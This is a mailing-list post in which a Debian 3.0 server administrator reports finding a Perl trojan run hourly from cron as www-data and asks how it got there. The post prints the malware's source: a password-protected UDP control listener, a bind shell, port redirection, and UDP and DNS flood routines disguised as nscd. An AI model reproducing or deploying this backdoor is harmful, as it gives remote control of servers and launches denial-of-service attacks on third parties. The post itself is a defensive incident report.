[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

a weird script worm uploaded via php with debian 3.0 ?

I logged in to my server today to find that
/usr/sbin/ncsd was running about 50 copies,
since I don't have BIND installed, obviously
something was up...they were also running with
the user www-data...
After a little bit of research I found a new
crontab entryFile: /tmp/crontab.XXXXLYukbF
0 * * * * /tmp/.nscdrecover

this starts at
auth.log.0:Jun  6 17:00:01 debian
PAM_unix[26934]: (cron) session opened for user
www-data by (uid=0)auth.log.0:Jun  6 17:00:02
debianPAM_unix[26934]: (cron) session closed for user
www-dataand runs every hour

and under SYSLOG it starts

syslog.3:Jun  6 16:27:27 debian crontab[26795]:
(www-data) LIST (www-data)syslog.3:Jun  6
16:27:28 debiancrontab[26798]:
(www-data) REPLACE (www-data)syslog.3:Jun  6
16:27:34debian crontab[26804]:
(www-data) LIST (www-data)syslog.3:Jun  6
16:27:34 debiancrontab[26807]:
(www-data) REPLACE (www-data)syslog.3:Jun  6
17:00:01 debian/USR/SBIN/CRON[26937]: (www-data) CMD

so I found /tmp/.ncsdrecover and it looks like
some kind of port scanner/trojan

the contents are pasted below

#!/usr/bin/perl -w

$pass = "J9YcGEyNypkzI";
$str = 'Mess with the best - die like a
use IO::Socket;
use IO::Select;
use POSIX;

sub redir
my $port = shift;
my $dest = shift;
$SIG{ALRM} = sub { exit };
        alarm 60;
$sa = IO::Socket::INET->new( Proto => "tcp",
Listen => 1, ReuseAddr => 1,               
LocalPort =>$port) or exit;
        $sin = $sa->accept or exit;
        alarm 0;
$sout = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $dest) or exit;$sin->autoflush(1);
$sel = IO::Select->new($sin, $sout);
while(@sock = $sel->can_read(180)) {
    foreach $s(@sock) {
        $buf = <$s>; exit unless($buf);
        print $sout $buf if($s eq $sin);
        print $sin $buf if($s eq $sout);

sub shell
my $port = shift;
$SIG{ALRM} = sub { exit };
        alarm 60;
use Socket;
        socket(S, PF_INET, SOCK_STREAM, 0);
        setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
        bind(S, sockaddr_in($port, INADDR_ANY));
        listen(S, 1);
        accept(X, S);
        alarm 0;
        open STDIN, "<&X";
        open STDOUT, ">&X";
        open STDERR, ">&X";
        close X;

sub udp
my $host = shift;
my $time = shift;
        $sock = IO::Socket::INET->new(Proto =>
        'udp', PeerAddr => $host,
        PeerPort => int(rand 65535))
                    or exit;       
                    $sock->autoflush(1);        $SIG{ALRM} = sub { exit };
        alarm 15 unless(alarm $time);
        print $sock $str while(1);

sub ddns
my $host = shift;
my $time = shift;
        $sock = new IO::Socket::INET->new(Proto
        => 'udp', PeerAddr => $host,
        PeerPort => 53) or exit;
        $SIG{ALRM} = sub { exit };
        alarm 15 unless(alarm $time);
while(1) {
        my $s = int(rand(89)+10);
        my $r1 = int(rand(89)+10);
        my $r2 = int(rand(89)+10);
        my $r3 = int(rand(89)+10);
        my $r4 = int(rand(89)+10);

$0 = '/usr/sbin/nscd'.' 'x100;
exit if fork;
open STDIN, "</dev/null";
open STDOUT, ">/dev/null";
open STDERR, ">/dev/null";

$csock = IO::Socket::INET->new(Proto => 'udp',
LocalPort => 1337, ReuseAddr => 1) or
exit;while($string =<$csock>)
        my ($pw, $cmd, $arg1, $arg2) = split "
        ", $string;        next unless($cmd);
        next unless($arg1);
        next unless(crypt($pw, $pass) eq $pass);
        if ($cmd eq "ping") {
            my $bsock =
            IO::Socket::INET->new(Proto =>
            'udp', PeerAddr => $arg1,
                  PeerPort => $arg2,
                            ReuseAddr => 1) or
                            print $bsock                            "pong ".`uname -mnrs`;
            close $bsock;
        } elsif ($cmd eq "die") {
            exit if(crypt($arg1, $pass) eq $pass);
        } elsif ($cmd eq "redir") {
            redir($arg1, $arg2) unless(fork);
        } elsif ($cmd eq "shell") {
            shell($arg1) unless(fork);
        } elsif ($cmd eq "udp") {
            udp($arg1, $arg2) unless(fork);
        } elsif ($cmd eq "ddns") {
            ddns($arg1, $arg2) unless(fork);

A little history is that my server was hacked
with some trojan that was sending out SPAM and I
did a fresh reinstall with debian so I could
have automatic updates and the like. I copied
over a few of the home directorys from the old
site.Then this all started after a user logged
in onFriday June 6th first login at 14:16 ending
14:24the script starts at 14:27

worldspe ftpd26405    pm6-s104.amazon. Fri Jun
6 15:06 - 15:06  (00:00)worldspe ftpd26325
pm6-s104.amazon. Fri Jun
6 14:51 - 14:51  (00:00)worldspe ftpd26315
pm6-s104.amazon. Fri Jun
6 14:49 - 14:49  (00:00)worldspe ftpd26291
pm6-s104.amazon. Fri Jun
6 14:43 - 14:44  (00:00)worldspe ftpd26183
pm6-s104.amazon. Fri Jun
6 14:16 - 14:24  (00:07)

The question is could this of been started via a
php script and if so what should I look for in
order to neutralize it and communicate with this
user ?
I already moved the /tmp file out.

While greping the php files I found nothing that
had /tmp or ncsd listed in it at all. This is
just kind of weird, and I was wondering if
anybody could be of help. Also no other files or
cgi-bin files were uploaded, so it might just be
a coincidence, but my logic points to it being
something that happened via something that was

I just don't know where this came from. I am
running Debian 3.0 woody with all security
update files. I ran rtkitchk and found nothing.
So I'm really perplexed as to what could of got
this script on the server. Any help would be
greatly appreciated as I found nothing about
this script by google.

Reply to: